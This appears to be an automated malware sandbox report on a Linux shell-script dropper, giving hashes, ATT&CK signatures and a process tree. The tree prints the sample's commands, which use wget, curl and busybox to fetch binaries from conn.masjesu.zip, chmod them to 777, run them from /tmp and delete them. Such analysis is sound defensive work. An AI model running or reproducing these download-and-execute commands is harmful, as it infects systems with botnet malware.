Analysis
-
max time kernel
149s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/10/2024, 01:24
Static task
static1
Behavioral task
behavioral1
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
-
Size
10KB
-
MD5
04d0449c41da21e91fcff668642e400d
-
SHA1
2a7724ac4a33aef57e864b4ab2ba41126ab9d3c0
-
SHA256
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764
-
SHA512
5c0f07e89ce67dfddfc6e90649fe73b20d8f460fd230aa8a787e68c8bafa8ac1acd949b497d7a0b0b55512ce9910ea9ea43bec6f80131074b11222c8fdab2094
-
SSDEEP
192:I5OQ49pUXvxwks6Pk+Y+k+j+2+e+Z7HTgG+HB6HTgGwNPk9pUXvfwks64+Y+k+j+:I5OQN6N+HB4wNPM
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1510 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 1511 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1514 curl 1500 wget 1504 curl 1506 busybox 1513 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl
Processes
-
/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh/tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh1⤵PID:1498
-
/bin/rm/bin/rm bins.sh2⤵PID:1499
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
PID:1500
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1504
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- System Network Configuration Discovery
PID:1506
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:1511
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:1512
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:1513
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- System Network Configuration Discovery
PID:1514
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97